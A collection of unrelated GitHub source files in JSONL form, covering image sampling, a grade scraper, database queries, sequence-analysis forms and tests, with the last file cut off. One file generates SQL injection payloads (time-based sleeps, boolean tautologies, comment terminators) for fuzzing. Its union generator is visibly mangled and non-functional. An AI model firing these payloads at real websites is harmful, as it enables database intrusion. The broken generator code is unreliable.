+{"seq_id":"28337117648","text":"'''Demonstrates how to sample and plot CIFAR10 images\nusing Keras API\n'''\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\n# numpy package\nimport numpy as np\nimport math\n\n# keras mnist module\nfrom keras.datasets import cifar10\n\n# for plotting\nimport matplotlib.pyplot as plt\n\n\n# load dataset\n(x_train, y_train), (x_test, y_test) = cifar10.load_data()\n\nclass_id = 0\nclass_count = 0\nimages = None\nfor i in range(100):\n while True:\n index = np.random.randint(0, x_train.shape[0], size=1)\n image = x_train[index]\n if y_train[index] == class_id:\n break\n\n if images is None:\n images = image\n else:\n images = np.concatenate([images, image], axis=0)\n class_count += 1\n if class_count == 10:\n class_id += 1\n class_count = 0\n \nprint(images.shape)\n\nplt.figure(figsize=(10, 10))\nnum_images = images.shape[0]\nimage_size = images.shape[1]\nrows = int(math.sqrt(num_images))\nrow_names = ['{}'.format(row) for row in ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']]\nindex = 0\nfor i in range(num_images):\n ax = plt.subplot(rows, rows, i + 1)\n image = images[i, :, :, :]\n image = np.reshape(image, [image_size, image_size, 3])\n plt.imshow(image)\n # plt.axis('off')\n ax.set_xticklabels([])\n ax.set_yticklabels([])\n ax.grid(False)\n ax.xaxis.set_ticks_position('none') \n ax.yaxis.set_ticks_position('none') \n if (i % rows) == 0:\n ax.set_ylabel(row_names[index], rotation=45, size='large')\n ax.yaxis.labelpad = 20\n print(row_names[index])\n index += 1\n\n# plt.tight_layout()\nplt.savefig(\"cifar10-samples.png\")\nplt.show()\nplt.close('all')\n","repo_name":"PacktPublishing/Advanced-Deep-Learning-with-Keras","sub_path":"chapter2-deep-networks/sampler-cifar10-2.1.0.py","file_name":"sampler-cifar10-2.1.0.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","stars":1645,"dataset":"github-code","pt":"52"} +{"seq_id":"72043172326","text":"import fuzzingbook\nfrom fuzzingbook.Grammars import *\n\nclass sqliPayload:\n def __init__(self):\n pass\n \n def error_message(self):\n error_msg = [\"You have an error in your SQL syntax\", \"Warning: mysql_fetch_array()\", \"sql test\"]\n return error_msg\n\n def generator(self,GRAMMAR):\n return set([simple_grammar_fuzzer(GRAMMAR) for i in range(50)])\n\n\n def generator_blind_sql(self):\n SQLI_blind_GRAMMAR = {\n \"\" : [\"\"],\n \"\" : [\" \"],\n \"\" : [\"and\", \"or\"],\n \"\" : [\"1=1\", \"1=0\", \"dbms_pipe.receive_message(('a'),5)\", \"WAITFOR DELAY '0:0:5'\" , \"SELECT pg_sleep(5)\", \"SELECT sleep(5)\"],\n \"\" : [\"'\", \"\\\"\"],\n \"\" : [\"-- \", \"#\", \t\"/* \"]\n }\n return self.generator(SQLI_blind_GRAMMAR)\n\n def generator_timebase_sql(self):\n SQLI_timebase_GRAMMAR = {\n \"\" : [\"\"],\n \"\" : [\" \"],\n \"\" : [\"and\", \"or\"],\n \"\" : [\"dbms_pipe.receive_message(('a'),5)\", \"WAITFOR DELAY '0:0:5'\" , \"SELECT pg_sleep(5)\", \"SELECT sleep(5)\"],\n \"\" : [\"'\", \"\\\"\"],\n \"\" : [\"-- \", \"#\", \t\"/* \"]\n }\n return self.generator(SQLI_timebase_GRAMMAR)\n\n\n def generator_union_sql(self):\n sql_union = \" \" : [ \"seclect\"],\n \"\" : a,\n \"\" : [\"--\", \"#\", \"\"]\n }\n payloads.update([simple_grammar_fuzzer(SQLI_union_GRAMMAR) for i in range(50)])\n return payloads\n\n\na = sqliPayload()\n\na.generator_union_sql()","repo_name":"nguyenanh1997/Fuzzz","sub_path":"sqliPayload.py","file_name":"sqliPayload.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21435266289","text":"'''\nFaça um programa que calcule a SOMA entre todas os NÚMEROS ÍMPARES que são\nMÚLTIPLOS DE TRÊS e que se encontram no intervalor de 1 até 500.\n'''\nsoma = 0\ncont = 0\nfor c in range(1, 501, 2): # conta até 500\n if c % 3 == 0:\n soma += c # para fazer soma tem de usar o conceito de acumulador\n cont += 1 # conta a quantidade de números foram somados\n #print(c, end=' ')\nprint('A soma de todos os números é {}'.format(soma))\nprint('A quantidade de números somados foi {}'.format(cont))\n\n \n","repo_name":"gmary23/python_guanabara","sub_path":"mundo2/desafio048.py","file_name":"desafio048.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34385733381","text":"arr=[1,20,0,5,9,10]\nn=len(arr)\ntemp=[0]*n\nindex=0\nfor i in arr:\n if i!=0:\n temp[index]=i\n index+=1\n\narr[::]=temp\nprint(arr)\n\n","repo_name":"SiddharthaMishra-dev/Data-structures-and-algorithms-using-python","sub_path":"zeroinend.py","file_name":"zeroinend.py","file_ext":"py","file_size_in_byte":142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41467384158","text":"import sys\n\nimport pytest\n\nfrom PySide6 import QtGui, QtWidgets\nfrom PySide6.QtGui import *\nfrom PySide6.QtTest import QTest\nfrom PySide6 import QtCore\n\n# Local\nfrom sas.qtgui.MainWindow.MainWindow import MainSasViewWindow\nfrom sas.qtgui.MainWindow.MainWindow import SplashScreen\nfrom sas.qtgui.Perspectives.Fitting import FittingPerspective\nfrom sas.qtgui.Utilities.HidableDialog import HidableDialog, ShowAgainResult\n\nfrom sas.system import config\nclass MainWindowTest:\n \"\"\"Test the Main Window GUI\"\"\"\n\n def __init__(self):\n config.override_with_defaults() # Disable saving of test file\n config.LAST_WHATS_NEW_HIDDEN_VERSION = \"999.999.999\" # Give a very large version number\n\n @pytest.fixture(autouse=True)\n def widget(self, qapp):\n '''Create/Destroy the GUI'''\n screen_resolution = QtCore.QRect(0, 0, 640, 480)\n w = MainSasViewWindow(screen_resolution, None)\n\n yield w\n\n def testDefaults(self, widget):\n \"\"\"Test the GUI in its default state\"\"\"\n assert isinstance(widget, QtWidgets.QMainWindow)\n assert isinstance(widget.centralWidget(), QtWidgets.QMdiArea)\n assert widget.workspace.horizontalScrollBarPolicy() == \\\n QtCore.Qt.ScrollBarAsNeeded\n assert widget.workspace.verticalScrollBarPolicy() == \\\n QtCore.Qt.ScrollBarAsNeeded\n\n def testSplashScreen(self, qapp):\n \"\"\" Test the splash screen \"\"\"\n splash = SplashScreen()\n assert isinstance(splash, QtWidgets.QSplashScreen)\n\n def testWidgets(self, qapp):\n \"\"\" Test enablement/disablement of widgets \"\"\"\n # Open the main window\n screen_resolution = QtCore.QRect(0, 0, 640, 480)\n tmp_main = MainSasViewWindow(screen_resolution, None)\n tmp_main.showMaximized()\n # See that only one subwindow is up\n assert len(tmp_main.workspace.subWindowList()) == 3\n # and that the subwindow is the fitting perspective\n assert isinstance(tmp_main.workspace.subWindowList()[0].widget(), FittingPerspective.FittingWindow)\n # Show the message widget\n tmp_main.guiManager.showWelcomeMessage()\n # Assure it is visible and a part of the MdiArea\n assert len(tmp_main.workspace.subWindowList()) == 3\n\n @pytest.mark.xfail(reason=\"2022-09 already broken - input file issue\")\n def testPerspectiveChanges(self, widget):\n \"\"\"\n Test all information is retained on perspective change\n \"\"\"\n def check_after_load(name):\n assert name == gui.perspective().name\n assert 1 == len(gui.perspective().currentTabDataId())\n assert (gui.perspective().currentTabDataId()[0]) in dataIDList\n\n # Base definitions\n FIT = 'Fitting'\n PR = 'Inversion'\n gui = widget.guiManager\n filesWidget = gui.filesWidget\n currentPers = filesWidget.cbFitting\n sendDataButton = filesWidget.cmdSendTo\n # Verify defaults\n assert hasattr(gui, 'loadedPerspectives')\n assert 4 == len(gui.loadedPerspectives)\n # Load data\n file = [\"cyl_400_20.txt\"]\n filesWidget.readData(file)\n data, _ = filesWidget.getAllData()\n dataIDList = list(data.keys())\n # Send data to fitting perspective\n QTest.mouseClick(sendDataButton, QtCore.Qt.LeftButton)\n # Verify one data set is loaded in the current Fitting Tab\n check_after_load(FIT)\n # Change to Inversion Perspective, Send data, and verify\n currentPers.setCurrentIndex(currentPers.findText(PR))\n QTest.mouseClick(sendDataButton, QtCore.Qt.LeftButton)\n check_after_load(PR)\n # Change back to Fitting Perspective and verify\n currentPers.setCurrentIndex(currentPers.findText(FIT))\n check_after_load(FIT)\n # Go back to Inversion perspective and verify data still exists\n currentPers.setCurrentIndex(currentPers.findText(PR))\n check_after_load(PR)\n\n def testExit(self, qapp, mocker):\n \"\"\"\n Test that the custom exit method is called on shutdown\n \"\"\"\n # Must mask sys.exit, otherwise the whole testing process stops.\n mocker.patch.object(sys, 'exit')\n # mocker.patch.object(QtWidgets.QMessageBox, 'question', return_value=QtWidgets.QMessageBox.Yes)\n mocker.patch.object(HidableDialog, 'exec', return_value=1)\n\n # Open, then close the main window\n screen_resolution = QtCore.QRect(0, 0, 640, 480)\n tmp_main = MainSasViewWindow(screen_resolution, None)\n tmp_main.close()\n\n # See that the MessageBox method got called\n assert HidableDialog.exec.called_once()\n","repo_name":"SasView/sasview","sub_path":"src/sas/qtgui/MainWindow/UnitTesting/MainWindowTest.py","file_name":"MainWindowTest.py","file_ext":"py","file_size_in_byte":4688,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"52"} +{"seq_id":"74508916323","text":"#도시의개수n,\n#도로의길이n-1개\n#각 도시의 주유소에서 리터당가격\n#앞의 주유소 min값을 갱신하여 그걸로 매 거리의 값을 사는거야.\nn = int(input())\ndist = list(map(int,input().split()))\nprice = list(map(int,input().split()))\nmin_value = price[0]\nres = 0\nfor i in range(n-1):\n min_value = min(min_value,price[i])\n res += dist[i]*min_value\nprint(res)","repo_name":"young0264/hellopycharm","sub_path":"백준/13305_주유소.py","file_name":"13305_주유소.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70211785446","text":"from query_handler import *\n\n\nclass ProductQueries:\n \"\"\"\n Class is responsible to fulfill sql queries ,\n according to the passed data\n \"\"\"\n\n @staticmethod\n def if_catalog_num_exists(catalog_num: str) -> bool:\n \"\"\"\n Function that gets as a parameter string and checks if there is such a catalog number in a Table of selected db\n :param catalog_num: catalog number we want to check in a table of a chose db\n :return: True if catalog number exists, otherwise False\n :raises QueryExecutionError exceptions could be raised if there is an error executing the SQL query or interacting with the database\n :raises DatabaseError exceptions could be raised if there is an error executing the SQL query or interacting with the database\n :raises ConnectionError exceptions could be raised if there are issues with the database connection\n :raises OperationalError exceptions could be raised if there are issues with the database connection\n \"\"\"\n q = QueryHandler(\"localhost\", \"products\", \"root\", \"\")\n check_catalog_num_query = q.execute_fetch(\"SELECT catalog_num FROM product_list WHERE catalog_num=%s \",\n (catalog_num,))\n if len(check_catalog_num_query) != 0:\n return True\n return False\n\n @staticmethod\n def update_product(prod_name: str, price: float, catalog_num: str) -> None:\n \"\"\"\n Function that takes as parameters product name, price and catalog number\n checks if such a product exists, if it exists updates the item according to catalog number\n :param prod_name: product name that should be updated\n :param price: price that should be updated\n :param catalog_num: catalog number according to what the products should be found and updated\n :return: None\n :raises QueryExecutionError exceptions could be raised if there is an error executing the SQL query or interacting with the database\n :raises DatabaseError exceptions could be raised if there is an error executing the SQL query or interacting with the database\n :raises ConnectionError exceptions could be raised if there are issues with the database connection\n :raises OperationalError exceptions could be raised if there are issues with the database connection\n \"\"\"\n q = QueryHandler(\"localhost\", \"products\", \"root\", \"\")\n if ProductQueries.if_catalog_num_exists(catalog_num):\n query = \"UPDATE product_list SET prod_name=%s, price=%s WHERE catalog_num=%s\"\n params = (prod_name, price, catalog_num)\n q.execute_non_fetch(query, params)\n\n @staticmethod\n def add_new_prod(catalog_num: str, prod_name: str, price: float) -> None:\n \"\"\"\n Create new product in a chosen db according to passed parameters\n :param catalog_num: catalog number of a product\n :param prod_name: name of a product\n :param price: product's price\n :return: None\n :raises QueryExecutionError exceptions could be raised if there is an error executing the SQL query or interacting with the database\n :raises DatabaseError exceptions could be raised if there is an error executing the SQL query or interacting with the database\n :raises ConnectionError exceptions could be raised if there are issues with the database connection\n :raises OperationalError exceptions could be raised if there are issues with the database connection\n \"\"\"\n q = QueryHandler(\"localhost\", \"products\", \"root\", \"\")\n query = \"INSERT INTO product_list( catalog_num, prod_name, price) VALUES (%s,%s, %s)\"\n params = (catalog_num, prod_name, price)\n q.execute_non_fetch(query, params)\n","repo_name":"HannaK-Git/PyDataWarehousingTool","sub_path":"oop_ex/final_project/product_db_queries.py","file_name":"product_db_queries.py","file_ext":"py","file_size_in_byte":3787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21001869544","text":"import urllib2\nimport operator\nimport os\nfrom bs4 import BeautifulSoup\n\n\nclass Student:\n\tdef __init__(self, name, grade):\n\t\tself._name = name\n\t\tself._grade = grade\n\n\tdef __repr__(self):\n\t\treturn self._name + \" \" + str(self._grade)\n\nif not os.path.exists('partial.html'):\n\tresponse = urllib2.urlopen('https://docs.google.com/spreadsheets/d/1We7B7CbRNWxnR-BrO1t7Dq7J-wDL0MssIBl7tHO-9hc/pubhtml#')\n\tf = open('partial.html', 'w')\n\tf.write(response.read())\n\t\nwith open('partial.html', 'r') as f:\n\thtml_doc = f.read()\n\nsoup = BeautifulSoup(html_doc, 'html.parser')\n\ndiv_tag = soup.find_all('div', id = \"1864821402\")\n\ndiv_soup = BeautifulSoup(str(div_tag[0].contents), 'html.parser')\n\nempty_cells = div_soup.find_all(\"td\", class_=\"s5\")\n\nfor emptycell in empty_cells:\n\temptycell['class'] = \"s4\"\n\nempty_cells = div_soup.find_all(\"td\", class_=\"s3\")\n\nfor emptycell in empty_cells:\n\temptycell['class'] = \"s2\"\n\nempty_cells = div_soup.find_all(\"td\", class_=\"s10\")\n\nfor emptycell in empty_cells:\n\temptycell['class'] = \"s2\"\n\nempty_cells = div_soup.find_all(\"td\", class_=\"s11\")\n\nfor emptycell in empty_cells:\n\temptycell['class'] = \"s4\"\n\nall_names = div_soup.find_all(\"td\", class_=\"s2\")\nall_grades = div_soup.find_all(\"td\", class_=\"s4\")\n\nall_names = [name for name in all_names if name.getText() != \"\"]\nall_grades = [grade for grade in all_grades if grade.getText() not in [\"Pb1\", \"Pb2\", \"Pb3\", \"Pb4\", \"Total\"]]\n\nnames = []\ngrades = []\n\nfor i in range(0, len(all_names), 2):\n\tnames.append(all_names[i].getText() + \" \" + all_names[i + 1].getText())\n\nfor i in range(4, len(all_grades), 5):\n\tif all_grades[i].getText() == \"\":\n\t\tgrades.append(0)\n\telse:\n\t\tgrades.append(int(all_grades[i].getText()))\n\nassert(len(grades) == len(names))\n\nstudents = []\nfor i in range(min(len(grades), len(names))):\n\tstudents.append(Student(names[i], grades[i]))\n\nstudents = sorted(students, key = operator.attrgetter('_grade'), reverse=True)\n\nwith open(\"main.html\", 'w') as f:\n\tcnt = 0\n\tfor student in students:\n\t\tcnt += 1\n\t\tline = str(cnt) + \" \" + student._name + \" \" + str(student._grade) + '
'\n\t\tf.write(line.decode('unicode-escape').encode('utf-8'))\n\t\tf.write('\\n')\n\nwith open(\"main.html\", 'r') as f:\n\tprint(f.read())\n\n","repo_name":"rusucosmin/courses","sub_path":"ubb/algebra/sort_partial.py","file_name":"sort_partial.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"52"} +{"seq_id":"16578218430","text":"import tempfile\nimport textwrap\nimport subprocess\nimport ast\nfrom Bio.Align.Applications import ClustalOmegaCommandline\nfrom database.models import PesticidalProteinDatabase, UserUploadData, ProteinDetail\nfrom django import forms\nfrom django.core.files.storage import FileSystemStorage\nfrom django.core.files.base import ContentFile\nfrom Bio import SeqIO\nfrom Bio import Seq\nfrom django.forms import widgets\nfrom django.db.models import Q\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Submit, Layout, Row, Column, HTML, ButtonHolder\n\n# def handle_uploaded_file:\n# with open('some/file/name.txt', 'wb+') as destination:\n# for chunk in f.chunks():\n# destination.write(chunk)\n\n\ndef write_sequence_file(sequence: str):\n \"\"\" Validate protein sequence\"\"\"\n tmp_seq = tempfile.NamedTemporaryFile(mode=\"wb+\", delete=False)\n\n if len(str(sequence.strip())) == 0:\n raise forms.ValidationError(NEEDLE_CORRECT_SEQ_ERROR_MSG)\n\n if str(sequence).strip()[0] != \">\":\n tmp_seq.write(\">seq1\\n\".encode())\n\n tmp_seq.write(sequence.encode())\n tmp_seq.close()\n\n return tmp_seq.name\n\n\ndef is_fasta(content):\n fasta = SeqIO.parse(content, \"fasta\")\n return any(fasta)\n\n\ndef guess_if_protein(seq, thresh=0.99):\n \"\"\"Guess if the given sequence is Protein.\"\"\"\n # protein_letters = ['C', 'D', 'S', 'Q', 'K','I','P','T','F','N','G',\n # 'H','L','R','W','A','V','E','Y','M']\n protein_letters = ['A', 'C', 'G', 'T']\n # import pudb\n # pu.db\n for record in SeqIO.parse(seq, \"fasta\"):\n seq = record.seq\n\n seq = seq.upper()\n protein_alpha_count = 0\n for letter in protein_letters:\n protein_alpha_count += seq.count(letter)\n\n return (len(seq) == 0 or float(protein_alpha_count) / float(len(seq)) >= thresh)\n\n\nclass UserDataForm(forms.Form):\n\n userdata = forms.CharField(\n widget=forms.Textarea(\n attrs={'placeholder': 'Paste your fasta sequence'}),\n required=False, label=\"User Data\"\n )\n\n userfile = forms.FileField(\n label='or Select a fasta file to upload',\n required=False,\n # help_text='max. 42 megabytes',\n )\n\n def __init__(self, *args, session=None, **kwargs):\n self.session = session\n super().__init__(*args, **kwargs)\n self.fields['userdata'].widget.attrs['cols'] = 50\n self.helper = FormHelper()\n self.helper.form_id = 'id-UserDataForm'\n self.helper.form_class = 'UserDataForm'\n self.helper.form_method = 'post'\n self.helper.form_action = 'view_cart'\n self.helper.add_input(Submit('submit', 'Add to Cart'))\n\n def clean(self):\n userfile = self.cleaned_data.get('userfile')\n userdata = self.cleaned_data.get('userdata')\n\n if userfile:\n content = userfile.read().decode().strip()\n elif userdata:\n content = userdata\n else:\n raise forms.ValidationError('Please provide at least one field')\n\n if userfile and userdata:\n raise forms.ValidationError('Please use only one field')\n\n userdata = write_sequence_file(content)\n\n fasta = is_fasta(userdata)\n\n if fasta:\n dna = guess_if_protein(userdata)\n\n else:\n raise forms.ValidationError(\n \"Please paste valid fasta sequence file\")\n\n if not dna:\n for rec in SeqIO.parse(userdata, \"fasta\"):\n name = rec.id\n sequence = str(rec.seq)\n UserUploadData.objects.create(\n session_key=self.session.session_key, name=name, sequence=sequence)\n\n else:\n raise forms.ValidationError(\n \"Please provide valid protein sequence file\")\n\n # return self.protein\n\n\nclass AnalysisForm(forms.Form):\n\n list_names = forms.CharField(\n widget=forms.HiddenInput(),\n required=False\n )\n\n list_nterminal = forms.CharField(\n widget=forms.HiddenInput(),\n required=False\n )\n\n list_middle = forms.CharField(\n widget=forms.HiddenInput(),\n required=False\n )\n\n list_cterminal = forms.CharField(\n widget=forms.HiddenInput(),\n required=False\n )\n\n userdataids = forms.CharField(\n widget=forms.HiddenInput(),\n required=False\n )\n tool = forms.ChoiceField(required=False,\n choices=[('clustal', 'Clustal')])\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n #self.fields['sequence_in_form'].label = ''\n self.helper = FormHelper()\n self.helper.form_id = 'id-UserDataForm'\n self.helper.form_class = 'UserDataForm'\n self.helper.form_method = 'post'\n self.helper.form_action = 'domain_analysis'\n self.helper.add_input(Submit('submit', 'Submit'))\n\n def clean_userdataids(self):\n self.userdata = self.cleaned_data.get('userdataids', [])\n if self.userdata:\n self.userdata = [int(s) for s in self.userdata.split(',')]\n return self.userdata\n\n def clean(self):\n self.combined_selection = []\n try:\n self.selected_values = ast.literal_eval(\n self.cleaned_data.get('list_names'))\n except:\n self.selected_values = []\n\n try:\n self.list_nterminal = ast.literal_eval(\n self.cleaned_data.get('list_nterminal'))\n except:\n self.list_nterminal = []\n\n try:\n self.list_cterminal = ast.literal_eval(\n self.cleaned_data.get('list_cterminal'))\n except:\n self.list_cterminal = []\n\n try:\n self.list_middle = ast.literal_eval(\n self.cleaned_data.get('list_middle'))\n except:\n self.list_middle = []\n\n if self.list_nterminal:\n self.combined_selection += self.list_nterminal\n if self.list_middle:\n self.combined_selection += self.list_middle\n if self.list_cterminal:\n self.combined_selection += self.list_cterminal\n if self.selected_values:\n self.combined_selection += self.selected_values\n\n if len(self.combined_selection) <= 3:\n raise forms.ValidationError(\n \"Select more than three sequences for the analysis\")\n elif self.combined_selection:\n self.combined_selection = list(set(self.combined_selection))\n else:\n raise forms.ValidationError(\n \"Make some selection to do the analysis\")\n\n # if not self.combined_selection:\n # raise forms.ValidationError('Select some sequences')\n # if self.count_number_lines() <= 3:\n # raise forms.ValidationError(\n # 'Please select more than three sequences')\n\n return self.cleaned_data\n\n def save(self):\n self.write_files_for_clustal()\n self.protein_detail_data()\n self.write_input_file_clustal()\n self.count_number_lines()\n\n print(\"tree output file\", self.guidetree_out_tmp.name)\n print(\"input file clustal\", self.clustalomega_in_tmp.name)\n print(\"output file clustal\", self.clustalomega_out_tmp.name)\n\n return self.clustalomega_in_tmp.name, self.guidetree_out_tmp.name, self.num_lines\n\n def count_number_lines(self):\n self.num_lines = sum(1 for line in open(\n self.clustalomega_in_tmp.name) if line.startswith(\">\"))\n\n def write_files_for_clustal(self):\n \"\"\" Validate protein sequence \"\"\"\n self.clustalomega_in_tmp = tempfile.NamedTemporaryFile(\n mode=\"wb+\", delete=False)\n self.clustalomega_out_tmp = tempfile.NamedTemporaryFile(\n mode=\"wb+\", delete=False)\n self.guidetree_out_tmp = tempfile.NamedTemporaryFile(\n mode=\"wb+\", delete=False)\n\n def protein_detail_data(self):\n self.accession = {}\n\n self.data = \\\n PesticidalProteinDatabase.objects.filter(\n name__in=self.combined_selection)\n if self.data:\n for item in self.data:\n self.accession[item.accession] = item\n\n self.protein_detail = ProteinDetail.objects.filter(\n accession__in=list(self.accession.keys()))\n\n def write_input_file_clustal(self):\n userdata = UserUploadData.objects.filter(\n pk__in=self.userdata)\n\n with open(self.clustalomega_in_tmp.name, 'wb') as temp:\n for item in self.data:\n output = ''\n item_name = item.name\n if item.name in self.list_nterminal:\n nterminal = [\n protein for protein in self.protein_detail if protein.accession == item.accession]\n item_name += '_d1'\n for item1 in nterminal:\n output += item1.get_endotoxin_n()\n if item.name in self.list_middle:\n middle = [\n protein for protein in self.protein_detail if protein.accession == item.accession]\n item_name += '_d2'\n for item1 in middle:\n output += item1.get_endotoxin_m()\n # print(\"form\", output)\n if item.name in self.list_cterminal:\n cterminal = [\n protein for protein in self.protein_detail if protein.accession == item.accession]\n item_name += '_d3'\n for item1 in cterminal:\n output += item1.get_endotoxin_c()\n\n if item.name in self.selected_values:\n fasta = textwrap.fill(item.sequence, 80)\n output += fasta\n # temp.write(str_to_write.encode())\n\n if output:\n str_to_write = f\">{item_name}\\n{output}\\n\"\n temp.write(str_to_write.encode())\n\n for item in userdata:\n fasta = textwrap.fill(item.sequence, 80)\n if len(item.name) > 10:\n item.name = item.name[:10]\n str_to_write = f\">{item.name}\\n{fasta}\\n\"\n temp.write(str_to_write.encode())\n\n\nclass DendogramForm(forms.Form):\n\n category_type = forms.MultipleChoiceField(\n widget=forms.CheckboxSelectMultiple,\n choices='',\n required=False\n )\n\n def __init__(self, *args, **kwargs):\n super(DendogramForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_id = 'id-dendogram'\n self.helper.form_class = 'dendogramForms'\n self.helper.form_method = 'post'\n self.helper.form_action = 'dendogram_celery'\n\n self.helper.add_input(Submit('submit', 'Submit'))\n\n categories = \\\n PesticidalProteinDatabase.objects.order_by(\n 'name').values_list('name', flat=True)\n self.category_prefixes = {}\n self.category_options = [('all', 'All')]\n for category in categories:\n prefix = category[0:3]\n self.category_prefixes[prefix.lower()] = prefix.title()\n self.category_options.extend(\n sorted(self.category_prefixes.items(), key=lambda x: x[0][:3]))\n\n self.fields['category_type'].choices = self.category_options\n self.fields['category_type'].label = ''\n\n def clean(self):\n self.open_files_for_clustal()\n self.filter_categories()\n self.write_input_file_clustal()\n self.count_number_lines()\n\n if self.numlines < 3:\n raise forms.ValidationError(\n \"At least three or more sequences are needed\")\n\n def save(self):\n # self.run_clustal()\n return self.clustalomega_in_tmp.name, self.guidetree_out_tmp.name\n\n def count_number_lines(self):\n self.numlines = sum(1 for line in open(\n self.clustalomega_in_tmp.name) if line.startswith(\">\"))\n\n # if self.num_lines <= 3:\n # raise forms.ValidationError(\n # \"Atleast three or more sequences aare needed.This category has less than 3\")\n\n def open_files_for_clustal(self):\n \"\"\" open files for clustal \"\"\"\n self.clustalomega_in_tmp = tempfile.NamedTemporaryFile(\n mode=\"wb+\", delete=False)\n self.clustalomega_out_tmp = tempfile.NamedTemporaryFile(\n mode=\"wb+\", delete=False)\n self.guidetree_out_tmp = tempfile.NamedTemporaryFile(\n mode=\"wb+\", delete=False)\n\n def filter_categories(self):\n \"\"\" \"\"\"\n self.category_type = self.cleaned_data.get('category_type')\n self.data = PesticidalProteinDatabase.objects.none()\n for category in self.category_type:\n if category == 'all':\n self.data |= PesticidalProteinDatabase.objects.all()\n print(self.data)\n else:\n self.data |= PesticidalProteinDatabase.objects.filter(\n name__istartswith=category)\n\n def write_input_file_clustal(self):\n \"\"\" \"\"\"\n str_to_write = b''\n with open(self.clustalomega_in_tmp.name, 'wb') as temp:\n for category in self.category_type:\n if category == 'all':\n for item in self.data:\n str_to_write = f\">{item.name}\\n{item.sequence}\\n\"\n lines = str_to_write.count('\\n')\n temp.write(str_to_write.encode())\n else:\n for item in self.data:\n for category in self.category_type:\n if category.capitalize() in item.name:\n str_to_write = f\">{item.name}\\n{item.sequence}\\n\"\n lines = str_to_write.count('\\n')\n temp.write(str_to_write.encode())\n","repo_name":"Amrithasuresh/BPPRC_v1","sub_path":"clustalanalysis/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":13922,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"17294256082","text":"## TCPClient.py ##\r\n\r\n# To call this code either type 'python3 TCPClient.py'\r\n# or put server's ip and port no. like\r\n# 'python3 TCPClient.py 127.0.0.1 12000'\r\n# or 'python3 TCPClient.py localhost 12000'\r\n\r\n# this code runs under python3.3 only (not python2.7)\r\n\r\nfrom socket import *\r\nimport sys\r\n\r\n## Allow user to input server's ip and port no.\r\nif len(sys.argv) == 1: # the server is localhost and at port 12000 \r\n\tserverName = '127.0.0.1'\r\n\tserverPort = 12002\r\nelif len(sys.argv) == 3: # use other server's address and port\r\n\tserverName = sys.argv[1]\r\n\tserverPort = int(sys.argv[2])\r\n\r\nclientSocket = socket(AF_INET, SOCK_STREAM)\r\nclientSocket.connect((serverName,serverPort))\r\n\r\n# Just want to see the socket info\r\nprint('The clinet is (ip, port no.): ', clientSocket.getsockname())\r\n\r\nsentence = input('Input lowercase sentence:')\r\n\r\nclientSocket.send(sentence.encode())\r\n\r\nmodifiedSentence = clientSocket.recv(1024)\r\n\r\nprint('From Server: ', modifiedSentence.decode())\r\n\r\nclientSocket.close()\r\n","repo_name":"somsakk/somsakk","sub_path":"web/python/TCPClient.py","file_name":"TCPClient.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"16945683189","text":"'''\nУсловие\nПоследовательность Фибоначчи определяется так:\nφ0 = 0, φ1 = 1, φn = φn−1 + φn−2.\nПо данному числу n определите n-е число Фибоначчи φn.\nЭту задачу можно решать и циклом for.\n'''\na=int(input())\nb=[0,1]\nif a==0:\n print(0)\nelse:\n for i in range(2,a+1):\n b.append(b[i-1]+b[i-2])\n c=0\n print(max(b))","repo_name":"KMrsR/HMR_python","sub_path":"PythonTutor/lesson_6_14.py","file_name":"lesson_6_14.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"44314996729","text":"import numpy as np\nimport torch\nimport torch.nn.functional as F\nimport dnnlib\nfrom torch_utils import training_stats\nfrom torch_utils.ops import upfirdn2d\nfrom models import losses\nfrom torch.nn.parameter import Parameter\n\n\nclass Loss:\n def accumulate_gradients(self, phase, real_A, real_B, gain, cur_nimg): # to be overridden by subclass\n raise NotImplementedError()\n\n\nclass SCLoss(Loss):\n def __init__(self, device, G, D, F, G_ema, resolution: int,\n sc_layers: list, feature_net: str, sc_idt: bool, num_patches: int,\n patch_size:int, adaptive_loss: bool,\n lambda_GAN: float=1.0, lambda_SC: float=1.0, lambda_identity: float = 0,\n blur_init_sigma=0, blur_fade_kimg=0, **kwargs):\n super().__init__()\n self.device = device\n self.G = G\n self.G_ema = G_ema\n self.D = D\n self.F = F\n self.resolution = resolution\n self.sc_idt = sc_idt\n self.num_patches = num_patches\n self.lambda_GAN = lambda_GAN\n self.lambda_SC = lambda_SC\n self.lambda_identity = lambda_identity\n self.blur_init_sigma = blur_init_sigma\n self.blur_fade_kimg = blur_fade_kimg\n self.adaptive_loss = adaptive_loss\n self.criterionIdt = torch.nn.MSELoss()\n\n if feature_net == 'efficientnet_lite':\n self.netPre = losses.EfficientNetLite().to(self.device)\n elif feature_net == 'vgg16':\n self.netPre = losses.VGG16().to(self.device)\n elif feature_net == 'learned':\n self.netPre = self.G\n else:\n raise NotImplemented(feature_net)\n\n\n # define loss functions\n self.criterion_sc 